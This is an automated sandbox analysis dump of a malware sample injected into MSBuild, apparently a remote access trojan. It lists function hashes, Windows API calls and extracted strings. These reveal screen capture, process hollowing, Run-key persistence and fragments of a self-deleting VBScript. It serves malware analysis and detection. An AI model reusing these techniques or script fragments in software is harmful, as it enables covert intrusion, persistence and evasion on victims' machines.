                                                                                                                        • API ID:
                                                                                                                        • String ID: 0
                                                                                                                        • API String ID: 0-4108050209
                                                                                                                        • Opcode ID: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                        • Instruction ID: e47b97b21f836cd03f295ee90de6feb37cae4df0254a032430ab3cefd666e269
                                                                                                                        • Opcode Fuzzy Hash: 0cdc0b4430c882dd513f9aba2f942575131dd1f5e6007437ccc46010af73f7df
                                                                                                                        • Instruction Fuzzy Hash: C851AC3160070457DF388A6985DA7BF6B959B0E700F18352FE48AFB382C60DED02979E
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: @
                                                                                                                        • API String ID: 0-2766056989
                                                                                                                        • Opcode ID: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                        • Instruction ID: 4dd25ef8aece06dcbd44762d080e1d81d96ea4c89eb3931c7e752ffea448aa68
                                                                                                                        • Opcode Fuzzy Hash: 277f5b14ebfb31d9acdfcb19b599133ffeee57438103c682c3dacb2c81b16d7f
                                                                                                                        • Instruction Fuzzy Hash: 99417576A083158FC314CE29D18021BFBE1FBC8300F568A2EF99693350D679E980CB86
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID: >G
                                                                                                                        • API String ID: 0-1296849874
                                                                                                                        • Opcode ID: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction ID: d77b428d8deff70f46db9a150fef47e19855adfe796a652afc1ecdf390514463
                                                                                                                        • Opcode Fuzzy Hash: 567adef0f6a617ff7e9a8750fccc1eb3e230b1b82912df90697507ac2483188c
                                                                                                                        • Instruction Fuzzy Hash: D1110BF724C18143EE74862DD8B46B7A795EACE320F2C636BD0C14B758D52A99459908
                                                                                                                        APIs
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: HeapProcess
                                                                                                                        • String ID:
                                                                                                                        • API String ID: 54951025-0
                                                                                                                        • Opcode ID: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                        • Instruction ID: 9504a653bcf427532d5064532c05f1d04939bb5561e35e6535c2a7eba45b7a60
                                                                                                                        • Opcode Fuzzy Hash: c4eeb5daf7d20212f04cf1a35fe49476965deb7007d4ee0647dc212291e34da0
                                                                                                                        • Instruction Fuzzy Hash: 84A00270506201CB57404F756F0525937D9654559170580755409C5571D62585905615
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                        • Instruction ID: 1fbb2d6a6e610910e1865e113166bba559d0ad1400e2c5ed2b94208389d41108
                                                                                                                        • Opcode Fuzzy Hash: b5ca945c73f96586680b794a2cfc8b55e8f7bc2f58380cec5295694457d85c5e
                                                                                                                        • Instruction Fuzzy Hash: 4E323621D2AF014DE7639634C862336A649AFB73C5F19D737F81AB5AA6EB2CC4C34105
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                        • Instruction ID: 2a34495ee4f42e5442afe8381c33b9994a027dd0bc8bc0cc3fe6fc4803c66e78
                                                                                                                        • Opcode Fuzzy Hash: f36ab663cb4d239ef1e0a5f108238eabc662f1d3d061ede5d5b4150ec9228ddd
                                                                                                                        • Instruction Fuzzy Hash: 9732C1796087469BD714DF2AC4807ABB7E1BF84304F444A2EFC958B381D778DD858B8A
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                        • Instruction ID: 022d1978040d43b7ea9bbfc0a41ffb8b00617051ae00cac38c3f572af68edcce
                                                                                                                        • Opcode Fuzzy Hash: 51f8d9063bc82676a5307432183369734bf664b3393a643c02daa012ce37ec01
                                                                                                                        • Instruction Fuzzy Hash: 0D028F717046518FD318CF2EE880536B7E1AF8E301B46863EE585C7395EB74E922CB95
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                        • Instruction ID: dd4ce2a6fae4266494c2f053a510589cf36d02151b1693af83bcfdcd1697f2cb
                                                                                                                        • Opcode Fuzzy Hash: 74e588301cf54894560b91a60f0e3518b6bdc06a9ff6f3e52f80e31c4ce3b340
                                                                                                                        • Instruction Fuzzy Hash: 55F13B716142548FC314DF1DE89187BB3E0EB8A301B460A2EF5C2D7392DB78E91ADB56
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                        • Instruction ID: a134442df30985c3d9ded0ed06b90328dea8838589cb671b1bd0994677c35241
                                                                                                                        • Opcode Fuzzy Hash: 7363a9fedaeb76f2bf31ad894624b0994c444190ff40f401d8ef5418a52334f3
                                                                                                                        • Instruction Fuzzy Hash: 60D1A171A083158BC721DE29C88096FB7E4FFD8354F446A2EF88597361EB38DD058B86
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                        • Instruction ID: 86422b113df266cbb8d28aa4d41e6099a1760efb4c6ea83322c03ecd969c618c
                                                                                                                        • Opcode Fuzzy Hash: e7326b31f45d4e50c8c50174bee11f9882207dfed74e31d12f4697374e1987de
                                                                                                                        • Instruction Fuzzy Hash: 46B1817951429A8ACB05EF28C4913F63BA1EF6A300F4851B9EC9CCF757D3399506EB24
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                        • Instruction ID: 3f92c48b0efc6548e9d2ace3e3fdbc0fca8b075b553eb95927f683fa27391a83
                                                                                                                        • Opcode Fuzzy Hash: dcaaf3a538fb6447e3283ddd15f45a67438a23807e0f4513107e056d33e47a72
                                                                                                                        • Instruction Fuzzy Hash: A4613471E0070867DE385928B896BBF23A8AB0D708F24755BE942DB381D65DDD43C24E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                        • Instruction ID: 61f6cd4e2a94a36a6652522188f48ed2bcd63c305fdb574287b7df62abf21a4e
                                                                                                                        • Opcode Fuzzy Hash: e4e8e107ebb569481f6dec165aac6f3bea1aaf1a879556bc36ff33913e703c4a
                                                                                                                        • Instruction Fuzzy Hash: BB51677170460D9BDB34E96894E77BFA3899B0E344F18350BD882B7382D60CED02939E
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID:
                                                                                                                        • String ID:
                                                                                                                        • API String ID:
                                                                                                                        • Opcode ID: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                        • Instruction ID: 42e819d74c2f676ea4fb49a2469d6a41ac5eaf2d1859dcf64078451750f97267
                                                                                                                        • Opcode Fuzzy Hash: 6f0963373f33ef73dbd289fc78ad1b7818d684b7f305e862658b304cf2148f24
                                                                                                                        • Instruction Fuzzy Hash: 49614E32A083119FC308DF35E581A5BB7E5FFDC718F550E1EF48996151E674EA088B8A
                                                                                                                        APIs
                                                                                                                        • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00417FB9
                                                                                                                        • CreateCompatibleDC.GDI32(00000000), ref: 00417FC4
                                                                                                                          • Part of subcall function 00418452: EnumDisplaySettingsW.USER32(?,000000FF,?), ref: 00418482
                                                                                                                        • CreateCompatibleBitmap.GDI32(?,00000000), ref: 00418045
                                                                                                                        • DeleteDC.GDI32(?), ref: 0041805D
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418060
                                                                                                                        • SelectObject.GDI32(00000000,00000000), ref: 0041806B
                                                                                                                        • StretchBlt.GDI32(00000000,00000000,00000000,00000000,?,?,?,?,00000000,?,00CC0020), ref: 00418093
                                                                                                                        • GetIconInfo.USER32(?,?), ref: 004180CB
                                                                                                                        • DeleteObject.GDI32(?), ref: 004180FA
                                                                                                                        • DeleteObject.GDI32(?), ref: 00418107
                                                                                                                        • DrawIcon.USER32(00000000,?,?,?), ref: 00418114
                                                                                                                        • BitBlt.GDI32(00000000,00000000,00000000,00000000,?,00000000,00000000,00000000,00660046), ref: 00418144
                                                                                                                        • GetObjectA.GDI32(?,00000018,?), ref: 00418173
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000028), ref: 004181BC
                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001), ref: 004181DF
                                                                                                                        • GlobalAlloc.KERNEL32(00000000,?), ref: 00418248
                                                                                                                        • GetDIBits.GDI32(00000000,00000000,00000000,?,00000000,00000000,00000000), ref: 0041826B
                                                                                                                        • DeleteDC.GDI32(?), ref: 0041827F
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418282
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418285
                                                                                                                        • GlobalFree.KERNEL32(00CC0020), ref: 00418290
                                                                                                                        • DeleteObject.GDI32(00000000), ref: 00418344
                                                                                                                        • GlobalFree.KERNEL32(?), ref: 0041834B
                                                                                                                        • DeleteDC.GDI32(?), ref: 0041835B
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 00418366
                                                                                                                        • DeleteDC.GDI32(?), ref: 00418398
                                                                                                                        • DeleteDC.GDI32(00000000), ref: 0041839B
                                                                                                                        • DeleteObject.GDI32(?), ref: 004183A1
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Delete$Object$AllocCreateGlobal$CompatibleFreeIconLocal$BitmapBitsDisplayDrawEnumInfoSelectSettingsStretch
                                                                                                                        • String ID: DISPLAY
                                                                                                                        • API String ID: 1765752176-865373369
                                                                                                                        • Opcode ID: cbbf896b03214424dbec6bf0bb467f1930cc53c9a426e4046c46faf51280246d
                                                                                                                        • Instruction ID: f05cd178694609e891ba83f5bdf02bb76ea447df34f4969275af8919d08089d1
                                                                                                                        • Opcode Fuzzy Hash: cbbf896b03214424dbec6bf0bb467f1930cc53c9a426e4046c46faf51280246d
                                                                                                                        • Instruction Fuzzy Hash: 12C17C31508345AFD3209F25DC44BABBBE9FF88751F04082EF989932A1DB34E945CB5A
                                                                                                                        APIs
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 0041728C
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 0041728F
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 004172A0
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004172A3
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 004172B4
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004172B7
                                                                                                                        • GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004172C8
                                                                                                                        • GetProcAddress.KERNEL32(00000000), ref: 004172CB
                                                                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 0041736C
                                                                                                                        • VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 00417384
                                                                                                                        • GetThreadContext.KERNEL32(?,00000000), ref: 0041739A
                                                                                                                        • ReadProcessMemory.KERNEL32(?,?,?,00000004,?), ref: 004173C0
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 00417440
                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 00417454
                                                                                                                        • GetCurrentProcess.KERNEL32(?,00000000,00000000,00000000,?,00000001,00000000,00000040), ref: 0041748B
                                                                                                                        • WriteProcessMemory.KERNEL32(?,?,?,00000004,00000000), ref: 00417558
                                                                                                                        • SetThreadContext.KERNEL32(?,00000000), ref: 00417575
                                                                                                                        • ResumeThread.KERNEL32(?), ref: 00417582
                                                                                                                        • VirtualFree.KERNEL32(00000000,00000000,00008000), ref: 0041759A
                                                                                                                        • GetCurrentProcess.KERNEL32(?), ref: 004175A5
                                                                                                                        • TerminateProcess.KERNEL32(?,00000000), ref: 004175BF
                                                                                                                        • GetLastError.KERNEL32 ref: 004175C7
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: Process$AddressHandleModuleProc$ThreadVirtual$ContextCurrentFreeMemoryTerminate$AllocCreateErrorLastReadResumeWrite
                                                                                                                        • String ID: ZwClose$ZwCreateSection$ZwMapViewOfSection$ZwUnmapViewOfSection$`#v$ntdll
                                                                                                                        • API String ID: 4188446516-108836778
                                                                                                                        • Opcode ID: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                        • Instruction ID: f03761d26bac9a2bfb1ad98f85ac7da09ef0bd98ba300517d6d91d37beebd467
                                                                                                                        • Opcode Fuzzy Hash: 42c1c999d1834e7e824fdbb4d1330a48ff0e689257c4ebc4fb7692fa9ae4ea32
                                                                                                                        • Instruction Fuzzy Hash: EEA17C71508304AFD7209F65DC45B6B7BF9FF48345F00082AF689C2661E775E984CB6A
                                                                                                                        APIs
                                                                                                                        • CreateMutexA.KERNEL32(00000000,00000001,00000000,004742F8,?,00000000), ref: 004112D4
                                                                                                                        • ExitProcess.KERNEL32 ref: 0041151D
                                                                                                                          • Part of subcall function 0041265D: RegOpenKeyExA.KERNEL32(80000001,00000000,00000000,00020019,00000000,004742F8), ref: 00412679
                                                                                                                          • Part of subcall function 0041265D: RegQueryValueExA.KERNEL32(00000000,00000000,00000000,00000000,00000208,?), ref: 00412692
                                                                                                                          • Part of subcall function 0041265D: RegCloseKey.KERNEL32(00000000), ref: 0041269D
                                                                                                                          • Part of subcall function 0041B61A: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000,?,?,?,00000000,00409F65), ref: 0041B633
                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,?,?,?,?,00000000), ref: 0041135B
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,T@,?,?,?,?,00000000), ref: 0041136A
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 00411375
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 0041137C
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 00411382
                                                                                                                          • Part of subcall function 004127D5: RegCreateKeyA.ADVAPI32(80000001,00000000,TUF), ref: 004127E3
                                                                                                                          • Part of subcall function 004127D5: RegSetValueExA.KERNEL32(TUF,000000AF,00000000,00000004,00000001,00000004,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 004127FE
                                                                                                                          • Part of subcall function 004127D5: RegCloseKey.ADVAPI32(?,?,?,?,0040B94C,004660E0,00000001,000000AF,00465554), ref: 00412809
                                                                                                                        • PathFileExistsW.SHLWAPI(?,?,?,?,?,00000000), ref: 004113B3
                                                                                                                        • GetTempPathW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000000), ref: 0041140F
                                                                                                                        • GetTempFileNameW.KERNEL32(?,temp_,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00411429
                                                                                                                        • lstrcatW.KERNEL32(?,.exe,?,?,?,?,?,?,?,00000000), ref: 0041143B
                                                                                                                          • Part of subcall function 0041B58F: SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,?,0040A009,?,00000000,00000000), ref: 0041B5EB
                                                                                                                          • Part of subcall function 0041B58F: WriteFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,0040A009,?,00000000,00000000), ref: 0041B5FF
                                                                                                                          • Part of subcall function 0041B58F: CloseHandle.KERNEL32(00000000,?,0040A009,?,00000000,00000000), ref: 0041B60C
                                                                                                                        • ShellExecuteW.SHELL32(00000000,open,?,00000000,00000000,00000001), ref: 00411483
                                                                                                                        • Sleep.KERNEL32(000001F4,?,?,?,?,00000000), ref: 004114C4
                                                                                                                        • OpenProcess.KERNEL32(00100000,00000000,?,?,?,?,?,00000000), ref: 004114D9
                                                                                                                        • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?,00000000), ref: 004114E4
                                                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00000000), ref: 004114EB
                                                                                                                        • GetCurrentProcessId.KERNEL32(?,?,?,?,00000000), ref: 004114F1
                                                                                                                          • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
                                                                                                                        Strings
                                                                                                                        Memory Dump Source
                                                                                                                        • Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                        • Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
                                                                                                                        Yara matches
                                                                                                                        Similarity
                                                                                                                        • API ID: File$CloseCreateProcess$HandleOpen$CurrentObjectPathSingleTempValueWait$ExecuteExistsExitMutexNamePointerQueryShellSleepWritelstrcat
                                                                                                                        • String ID: .exe$0DG$@CG$T@$WDH$exepath$open$temp_
                                                                                                                        • API String ID: 4250697656-2665858469
                                                                                                                        • Opcode ID: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                        • Instruction ID: b1cd6038c3dd2fca16f1d1fb39a824579eeb1b45f376adef666059b0b2e54ae4
                                                                                                                        • Opcode Fuzzy Hash: c80fabc7b58b6664533cdc435cbe53a9781b5ca893f5b0e43887563f66929a29
                                                                                                                        • Instruction Fuzzy Hash: D751B671A043156BDB00A7A0AC49EFE736D9B44715F1041BBF905A72D2EF7C8E828A9D
                                                                                                                        APIs
                                                                                                                          • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,00000000), ref: 0040C38B
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C39E
• SetFileAttributesW.KERNEL32(?,00000080,?,?,00000000), ref: 0040C3B7
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,00000000), ref: 0040C3E7
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
  • Part of subcall function 0041B58F: CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000002,00000080,00000000,?,00000000,?,?,00000000,0041B6A5,00000000,00000000,?), ref: 0041B5CE
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C632
• ExitProcess.KERNEL32 ref: 0040C63E
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: File$Terminate$AttributesProcessThread$CreateDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: """, 0$")$@CG$CreateObject("WScript.Shell").Run "cmd /c ""$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$\update.vbs$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$wend$while fso.FileExists("
• API String ID: 1861856835-3168347843
• Opcode ID: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
• Instruction ID: c8b5e11b4abf5c95f8ab28b2bb359051ef64700817c412cd349ec45860bdb676
• Opcode Fuzzy Hash: 30a7f1232d58b3c75cebc1c3b5ae0731fe694418f196ddfec79bbb146588a510
• Instruction Fuzzy Hash: EB9175316042005AC314FB25D852ABF7799AF91718F10453FF98A631E2EF7CAD49C69E
APIs
  • Part of subcall function 00411699: TerminateProcess.KERNEL32(00000000,pth_unenc,0040E670), ref: 004116A9
  • Part of subcall function 00411699: WaitForSingleObject.KERNEL32(000000FF), ref: 004116BC
• GetModuleFileNameW.KERNEL32(00000000,?,00000208,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C013
• RegDeleteKeyA.ADVAPI32(80000001,00000000), ref: 0040C026
• SetFileAttributesW.KERNEL32(00000000,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C056
• SetFileAttributesW.KERNEL32(?,00000080,?,?,?,?,?,004742F8,?,pth_unenc), ref: 0040C065
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_000099A9,00000000,004742F8,pth_unenc,0040BF26,004742E0,004742F8,?,pth_unenc), ref: 0040AFC9
  • Part of subcall function 0040AFBA: UnhookWindowsHookEx.USER32(004740F8), ref: 0040AFD5
  • Part of subcall function 0040AFBA: TerminateThread.KERNEL32(Function_00009993,00000000,?,pth_unenc), ref: 0040AFE3
  • Part of subcall function 0041AB38: GetCurrentProcessId.KERNEL32(00000000,76233530,00000000,?,?,?,?,00465900,0040C07B,.vbs,?,?,?,?,?,004742F8), ref: 0041AB5F
• ShellExecuteW.SHELL32(00000000,open,00000000,00465900,00465900,00000000), ref: 0040C280
• ExitProcess.KERNEL32 ref: 0040C287
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
• API ID: FileProcessTerminate$AttributesThread$CurrentDeleteExecuteExitHookModuleNameObjectShellSingleUnhookWaitWindows
• String ID: ")$.vbs$@CG$On Error Resume Next$Set fso = CreateObject("Scripting.FileSystemObject")$Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\$Software\Microsoft\Windows\CurrentVersion\Run\$Temp$`=G$exepath$fso.DeleteFile "$fso.DeleteFile(Wscript.ScriptFullName)$fso.DeleteFolder "$open$pth_unenc$wend$while fso.FileExists("
• API String ID: 3797177996-1998216422
• Opcode ID: d60b2599d57a11e7628afaf08605114e6dbdd8ff5cc87fa28741f108f7a6499c
• Instruction ID: 1063ce1f4075510d90626cdc8b34ac690c3cf2dc76fa2c9c3337a4c1feab76e8
• Opcode Fuzzy Hash: d60b2599d57a11e7628afaf08605114e6dbdd8ff5cc87fa28741f108f7a6499c
• Instruction Fuzzy Hash: B78191316042005BC315FB21D862ABF77A9ABD1308F10453FF586A71E2EF7CAD49869E
APIs
• mciSendStringW.WINMM(00000000,00000000,00000000,00000000), ref: 0041A2B2
• mciSendStringA.WINMM(play audio,00000000,00000000,00000000), ref: 0041A2C6
• CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,000000A9,00465554), ref: 0041A2EE
• PathFileExistsW.SHLWAPI(00000000,00000000,00000000,00473EE8,00000000), ref: 0041A2FF
• mciSendStringA.WINMM(pause audio,00000000,00000000,00000000), ref: 0041A340
• mciSendStringA.WINMM(resume audio,00000000,00000000,00000000), ref: 0041A358
• mciSendStringA.WINMM(status audio mode,?,00000014,00000000), ref: 0041A36D
• SetEvent.KERNEL32 ref: 0041A38A
• WaitForSingleObject.KERNEL32(000001F4), ref: 0041A39B
• CloseHandle.KERNEL32 ref: 0041A3AB
• mciSendStringA.WINMM(stop audio,00000000,00000000,00000000), ref: 0041A3CD
• mciSendStringA.WINMM(close audio,00000000,00000000,00000000), ref: 0041A3D7
Strings
Memory Dump Source
• Source File: 0000000F.00000002.3417717934.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_15_2_400000_MSBuild.jbxd
Yara matches
Similarity
